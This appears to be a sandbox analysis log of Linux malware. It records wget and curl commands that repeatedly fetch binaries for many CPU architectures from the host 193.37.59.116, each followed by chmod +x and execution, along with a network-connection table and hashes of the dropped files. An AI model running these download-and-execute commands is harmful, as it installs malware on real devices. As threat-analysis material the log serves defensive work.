[chmod +x RUN gdm3-config-err-gfb7nI jack5tr.sh mips snap-private-tmp systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arc]
/usr/bin/curl
[curl -O http://193.37.59.116/arc]
/usr/bin/cat
[cat arc]
/usr/bin/chmod
[chmod +x RUN arc gdm3-config-err-gfb7nI jack5tr.sh mips snap-private-tmp systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/x86_64]
/usr/bin/curl
[curl -O http://193.37.59.116/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x RUN arc gdm3-config-err-gfb7nI jack5tr.sh mips snap-private-tmp systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/mpsl]
/usr/bin/curl
[curl -O http://193.37.59.116/mpsl]
/usr/bin/cat
[cat mpsl]
/usr/bin/chmod
[chmod +x RUN arc gdm3-config-err-gfb7nI jack5tr.sh mips mpsl snap-private-tmp systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm]
/usr/bin/curl
[curl -O http://193.37.59.116/arm]
/usr/bin/cat
[cat arm]
/usr/bin/chmod
[chmod +x RUN arc arm gdm3-config-err-gfb7nI jack5tr.sh mips mpsl snap-private-tmp systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm5]
/usr/bin/curl
[curl -O http://193.37.59.116/arm5]
/usr/bin/cat
[cat arm5]
/usr/bin/chmod
[chmod +x RUN arc arm arm5 gdm3-config-err-gfb7nI jack5tr.sh mips mpsl snap-private-tmp systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm6]
/usr/bin/curl
[curl -O http://193.37.59.116/arm6]
/usr/bin/cat
[cat arm6]
/usr/bin/chmod
[chmod +x RUN arc arm arm5 arm6 gdm3-config-err-gfb7nI jack5tr.sh mips mpsl snap-private-tmp systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/arm7]
/usr/bin/curl
[curl -O http://193.37.59.116/arm7]
/usr/bin/cat
[cat arm7]
/usr/bin/chmod
[chmod +x RUN arc arm arm5 arm6 arm7 gdm3-config-err-gfb7nI jack5tr.sh mips mpsl snap-private-tmp systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/ppc]
/usr/bin/curl
[curl -O http://193.37.59.116/ppc]
/usr/bin/cat
[cat ppc]
/usr/bin/chmod
[chmod +x RUN arc arm arm5 arm6 arm7 gdm3-config-err-gfb7nI jack5tr.sh mips mpsl ppc snap-private-tmp systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/spc]
/usr/bin/curl
[curl -O http://193.37.59.116/spc]
/usr/bin/cat
[cat spc]
/usr/bin/chmod
[chmod +x RUN arc arm arm5 arm6 arm7 gdm3-config-err-gfb7nI jack5tr.sh mips mpsl ppc snap-private-tmp spc systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/m68k]
/usr/bin/curl
[curl -O http://193.37.59.116/m68k]
/usr/bin/cat
[cat m68k]
/usr/bin/chmod
[chmod +x RUN arc arm arm5 arm6 arm7 gdm3-config-err-gfb7nI jack5tr.sh m68k mips mpsl ppc snap-private-tmp spc systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86 x86_64]
/tmp/RUN
[./RUN]
/usr/bin/wget
[wget http://193.37.59.116/sh4]
/usr/bin/curl
[curl -O http://193.37.59.116/sh4]
/usr/bin/cat
[cat sh4]
/usr/bin/chmod
[chmod +x RUN arc arm arm5 arm6 arm7 gdm3-config-err-gfb7nI jack5tr.sh m68k mips mpsl ppc sh4 snap-private-tmp spc systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-ModemManager.service-uTzE7V systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-colord.service-7ZblLd systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-power-profiles-daemon.service-LlfQ3g systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-switcheroo-control.service-lq6Ttj systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-logind.service-Lkq0l4 systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-oomd.service-GmGgdR systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-resolved.service-YyiXTg systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-systemd-timedated.service-sN9gAb systemd-private-3b043a75bc5f48e1bf12a8d23ccac3b7-upower.service-klChwn x86 x86_64]
/tmp/RUN
[./RUN]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
| NL | 193.37.59.116:80 | 193.37.59.116 | tcp |
Files
/tmp/x86
| MD5 | c4a3f27654d167d92ac6df60a02b40e2 |
| SHA1 | b1707a6ada4a6538e7595cbbdd2cd3b3d2294166 |
| SHA256 | 9b31f7eb1e2b28c5497a06862119e0152893e8f80e2f5d508d3da577c3a5b100 |
| SHA512 | ee1fd253404678b44d026310d0ec655057602be0a83d2b9ae6e4eb0c357f74900fcaea430d8ced18d6debb8053bbdf4db39b7900b33080ce735ae87b25317f66 |
/tmp/mips
| MD5 | 038943a024bba0e623ee0fc71c0e9dc4 |
| SHA1 | daaffb7cab5f0b1973d602b1f6d8c8f35600dc0b |
| SHA256 | 28686b90cfd05ece614f0d3b36993a64be26cd550d836c576b2622b2e1955dbb |
| SHA512 | 3e6c767298d62657a8217d4258bea76bbbb4abb0b85423045a2eca691399d56952abad3197f501f4bbf71eee2fc30fd017cec58171274bb6021789b597871b07 |
/tmp/arc
| MD5 | 154506d20dcd8502b3820a2912b697e9 |
| SHA1 | 55c207a1c0aeabc6df6d0307f11a03137139d701 |
| SHA256 | 5937f6d6dadc5b9c5b3ad04297d3838d6c038ace39d0021b3055f09dd31d4c5c |
| SHA512 | aeeb083e7bc6e5e8701572f91a5731148f1b93ebe3ab2ebd6d10526f08771601d6f79450f22a5cb03b2d05e54a4bb5fde176d541a6cbc5893d64f9b8621c0112 |
/tmp/x86_64
| MD5 | 74eff98ceea934700653d0c0620419f8 |
| SHA1 | 037df252464667dbcdc6f4fde3ff9043a3b76909 |
| SHA256 | 7bf34fcdc8ad5964197369b95f1e05c98ac68890aa4a451204bac5a8a2426f89 |
| SHA512 | 81f6a484bf3dddfa9c0b574f207accde90b631545907eb2d15565e6ffdbbb177c5c97733090a0cac83d775007256a4ff67848fbbe95faa19adb199a312a6573c |
/tmp/mpsl
| MD5 | eba2a5a74d5beba7b9f903cfe07f9796 |
| SHA1 | 012af86b452d7e7f82bbd45b5bbef672d2b25c67 |
| SHA256 | 4c67bc4e9d0abfbccff5c49a713a3a4bfa11cdaa7a13a294733aedf9f5d7bcea |
| SHA512 | a35aa4ebfab6a69a76a3ea31c52ba27f8a5b306b54ed1f732f18f8ad61f1dea57ea5af0354d604cfdb6769419e0a9a44f10545c1f1a27ad018ec730b9fb480be |
/tmp/arm
| MD5 | 6b1fc0e45d31470659fe0e295bc63d4e |
| SHA1 | ce54569f5eefe03f56d5df2df3fe4830b0c9f177 |
| SHA256 | 6f942d2d27fea02c90ec772b8523891771a1ae6c4f05eecc3e0e3d8fa4776f22 |
| SHA512 | f3a3cc1705764a3be4e725d10ae10710d4a09750e629c8cf07974907ac88858bfa54bc86cca6947e51de468fe654669b751c48ee2e234c53f4f001b29fdb9fea |
/tmp/RUN
| MD5 | 9c1344aa17dc266ff8f8637b2becfc46 |
| SHA1 | 2dedb0abaf75446902f162dc8fc6e9b04fb9a8ee |
| SHA256 | 423e707b0c9e2d015f8f46df9053bbe469f240b7e1b5f9248f3172eecb36e4e4 |
| SHA512 | 382a31d139ee354d0078c06de83a3cce1cfe568c45b0b6b6586e954d0fc048ded37227797fe078ffcdd5539c2f70fd8338b5b6d72fb3a3e7f22230deacbb1da1 |
/tmp/arm5
| MD5 | fc7db008f770f37ccb16e8d23f9780ae |
| SHA1 | acd2865df9fec74fdafb227ce3136b715bb998b0 |
| SHA256 | 857587a2dc176d97becbd0d400804245e392fd87f92bb7ace51865619eb0a7db |
| SHA512 | c0e126cb47cbcd469d7b8b99ae7b5cb4cb25444adb91586acf02c36d9d21f221d897d0c2ba989371ea165a436ed49320219b074e5bb10afd0b2defb4319f097c |
/tmp/arm6
| MD5 | d6227412be050807781b974181739db6 |
| SHA1 | 14d20849fc59a62ed7f713afda3d9dda4cc2c850 |
| SHA256 | e559985c126f6872d3211cd971a7d8a64a6d17e247b5b14d0a7d85f9ad29ce09 |
| SHA512 | 7a58d6d56f24f1064262de862372531e4cb7967373a4253a2ddc631a195373102fbc19178393f9c568b6b977641bf7bf5b283ca11f033f93fdadfa4789bc9c76 |
/tmp/arm7
| MD5 | d0084c21e35f40b71450406d0298e622 |
| SHA1 | f2ce386f6ba9afdb7f95272ab867c913b0802cd9 |
| SHA256 | 9339521da875e8f082bd738ca8dc528d04ec605b19f46da59c55690f3bcd624f |
| SHA512 | 0f6618d607368f2251c48c9daa4d378ca89a6a053c7f5a981ad7e0d9683aa242d12f38b6f476dbbb36abd6ba2d627267cb3b9494bf3c4af40615c440be26f727 |
/tmp/ppc
| MD5 | 9b27ba0a33c0ecaf4c48bc1fdabf2538 |
| SHA1 | d568ee55ba8476a9121f9f9c6dbe4e9e18cbb266 |
| SHA256 | 6ad5fe25bc0730429eb72d60b5e841df775f5a6a08bc1c61edd182c7d9a41618 |
| SHA512 | 1428b89fbf2b432783eeef4e1362c840d92072c73490bef5f6c13e14de1cb8e8260adc323bfd433992be158dfd284ba21cabba3404527638cdbcdbfabd86baea |
/tmp/spc
| MD5 | 839129f80935155dff6a2db49753d6a9 |
| SHA1 | d0f9e58eb29c5fcf88b4bbdfe7e447dd9ed9b8ba |
| SHA256 | 073994fa01d7e8d34a63c9e1a1a45005f52f387c1166768ef419afb911ad5457 |
| SHA512 | ef2ce2ebb97feb7d955cae8f3f85bea2ab02b312efad8580bd7efc92684dc6cb0343c2c8f561ad8c4a9e2e40580585754d0ea214099d37c862629c5bd8b913c3 |
/tmp/m68k
| MD5 | e6391e323b334b1257f36bb2fcb34e25 |
| SHA1 | 1532d7dd78fb0b0263ee0df4ab3d007a68e45c41 |
| SHA256 | 66d4651d0746e2ac8801b370c3600e91354b65746ff6b636930180682a5c1728 |
| SHA512 | b4bad5f003ccec3aaa5f412ffebec85d4fd0ba12d7a53abad056fc4a8ba7392967812b886d32ce2e54d28de018a39c51980a724149ab98b7c23b589a3f631958 |
/tmp/sh4
| MD5 | f26f51b05d46bea29bcab58abb1a9ec1 |
| SHA1 | 8e527459d9d4c5c8b4ac161bdf36f56c89939fbf |
| SHA256 | ace829355d3f8c1b1d22f8e634de8a0719d4e266b1f631d591cc1168f2ce4466 |
| SHA512 | b60304f2fb247d8a171490d88183c7b56ab9458c39dae0cbd255145c5e463f5c7d78dbcda73c04f2eb3e33cff003c061473d86bb821d60bac12353506281ccea |